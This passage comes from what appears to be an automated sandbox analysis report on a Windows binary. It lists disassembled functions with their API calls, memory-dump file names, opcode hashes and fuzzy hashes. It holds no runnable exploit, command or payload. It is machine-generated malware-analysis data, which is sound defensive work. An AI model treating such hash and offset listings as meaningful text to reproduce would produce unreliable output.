                                              • lstrcpyW.KERNEL32(00000000,?,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7949
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 81d07ef5ef553b38fa658e1318076786641e0bafdafbe6fb25f87996a520b1ef
                                              • Instruction ID: 498b6f1bd637ff7030ed1b81e004e7ab6759bba3110f8aa7ea8a8c912b89baae
                                              • Opcode Fuzzy Hash: 81d07ef5ef553b38fa658e1318076786641e0bafdafbe6fb25f87996a520b1ef
                                              • Instruction Fuzzy Hash: 6911AF3A200202AFCB25AF35D855D7A77A9FF85350B50406BF946C73A4EB329851DBB1
                                              Function 00E07CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07D0B
                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E07D2A
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E07D42
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DEB7AD,00000000), ref: 00E07D6B
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID:
                                              • API String ID: 847901565-0
                                              • Opcode ID: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction ID: f8430d5eb6d33d6a9a721755ba1f189ceb72c80c63cd2c5a350ebb4ac3df7b56
                                              • Opcode Fuzzy Hash: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction Fuzzy Hash: 23110F31A04614AFCB108F29CC04AA63BA4EF86364B205324F979E72F0E731E9D1CB50
                                              Function 00E05660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E056BB
                                              • _wcslen.LIBCMT ref: 00E056CD
                                              • _wcslen.LIBCMT ref: 00E056D8
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend_wcslen
                                              • String ID:
                                              • API String ID: 455545452-0
                                              • Opcode ID: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction ID: 1ec368aeee353fcf52ac71aa23b70d57d443f8df30362a4f501fcdd96b454c0b
                                              • Opcode Fuzzy Hash: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction Fuzzy Hash: 1911A276600608A6DF209B61DC85AFF77ACEF11764B50512AF916B60C1EB7089C5CF60
                                              Function 00DD14CE Relevance: 6.1, APIs: 4, Instructions: 64processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD14FF
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00DD1506
                                              • CloseHandle.KERNEL32(00000004), ref: 00DD1520
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD154F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 2621361867-0
                                              • Opcode ID: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction ID: 77cdec8754e1505c76aab9ef628399d85c5af8fd139368aa2ca22d8c953d40f4
                                              • Opcode Fuzzy Hash: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction Fuzzy Hash: 3E114A7650020ABFDB118FA4ED49BDE7BA9EF48704F188115FA05A21A0C376CE64DB60
                                              Function 00DD1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00DD1A47
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A59
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A6F
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction ID: 602236a5ea570f32eb0683436bc4387e6785d76c0250bb469a958ed1e534f6a0
                                              • Opcode Fuzzy Hash: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction Fuzzy Hash: B2110C3AD01219FFEB11DBA5CD85FADBB78EB04750F200092E604B7290D6716E51DB94
                                              Function 00DDE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDE1FD
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00DDE230
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DDE246
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DDE24D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2880819207-0
                                              • Opcode ID: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction ID: e45d5d896533d9a74413062958155f4fd38996958ab3a31cbae119267c043edd
                                              • Opcode Fuzzy Hash: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction Fuzzy Hash: 7A110876904214BFCB01AFA99C05A9F7FAC9B45310F14435AF914F7391D271D94887B0
                                              Function 00D9D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,?,00D9CFF9,00000000,00000004,00000000), ref: 00D9D218
                                              • GetLastError.KERNEL32 ref: 00D9D224
                                              • __dosmaperr.LIBCMT ref: 00D9D22B
                                              • ResumeThread.KERNEL32(00000000), ref: 00D9D249
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                              • String ID:
                                              • API String ID: 173952441-0
                                              • Opcode ID: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction ID: 4d373d2a84ae845f39bb624bdf378a9cdcc27a7eebf25dfdbd0ae686d5883392
                                              • Opcode Fuzzy Hash: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction Fuzzy Hash: 7401F536805204BFCF115BA6DC09BAE7A6ADF82730F240319F925E61D0CB71C945C6B0
                                              Function 00D7600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                              • GetStockObject.GDI32(00000011), ref: 00D76060
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction ID: 12c7bfdaf1260b0e340bf2caf4732f5da30a04d99a81406faeb56a8fcc793141
                                              • Opcode Fuzzy Hash: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction Fuzzy Hash: AC11A172501908BFEF124FA4DC44EEA7B69FF18364F144206FA0852010E732DCA0DFA0
                                              Function 00D93B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00D93B56
                                                • Part of subcall function 00D93AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D93AD2
                                                • Part of subcall function 00D93AA3: ___AdjustPointer.LIBCMT ref: 00D93AED
                                              • _UnwindNestedFrames.LIBCMT ref: 00D93B6B
                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D93B7C
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00D93BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                              • String ID:
                                              • API String ID: 737400349-0
                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction ID: e4232d7f99a2579dc8acb75cf546af5f4a7fe8eaf61191aaeac778c928903f68
                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction Fuzzy Hash: 7A01E932100149BBDF126E95CC46EEB7B6AEF58758F044014FE4896121C732E962EBB0
                                              Function 00DA3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D713C6,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue), ref: 00DA30A5
                                              • GetLastError.KERNEL32(?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000,00000364,?,00DA2E46), ref: 00DA30B1
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000), ref: 00DA30BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction ID: b546487f0ca5d528bce5f40b4cb8ab4f8f749741eea6fa93e3d2bfc9cedd7ca3
                                              • Opcode Fuzzy Hash: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction Fuzzy Hash: 8501F732301622AFCB314F7A9C44A577B99AF07BA1B340720F945F3190C722D945C6F4
                                              Function 00DD7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DD747F
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD7497
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD74AC
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DD74CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                              • Instruction ID: 5de5a471b69d9bc3f77ca55e743af0ba3df93e86f92e7912c9ff1b825a6fbcbf
                                              • Opcode Fuzzy Hash: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                              • Instruction Fuzzy Hash: B011C4B12053109FE7218F54DC08F92BFFCFB00B00F1085AAA666D6291E771E948DB60
                                              Function 00DDB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0C4
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0E9
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0F3
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB126
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction ID: 6e1e94b403b83c6701dfc7473b09a0e563e19eeefc28e1f463625cd3aa2baf27
                                              • Opcode Fuzzy Hash: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction Fuzzy Hash: F1115E31C0162CDBCF00AFE5D959AFEBB78FF0A725F124187D941B2241CB3095948BA1
                                              Function 00DD2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                              • GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction ID: df641b4abfb2a4fcf8a264fb5b2bdd05c0c3a33261d8b473578d261443a562c4
                                              • Opcode Fuzzy Hash: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction Fuzzy Hash: F6E06DB11012247AD7201BA3AC0DEFB3E6DEB56FA1F140216B106E11809AA6C888C6F0
                                              Function 00E08863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E08887
                                              • LineTo.GDI32(?,?,?), ref: 00E08894
                                              • EndPath.GDI32(?), ref: 00E088A4
                                              • StrokePath.GDI32(?), ref: 00E088B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
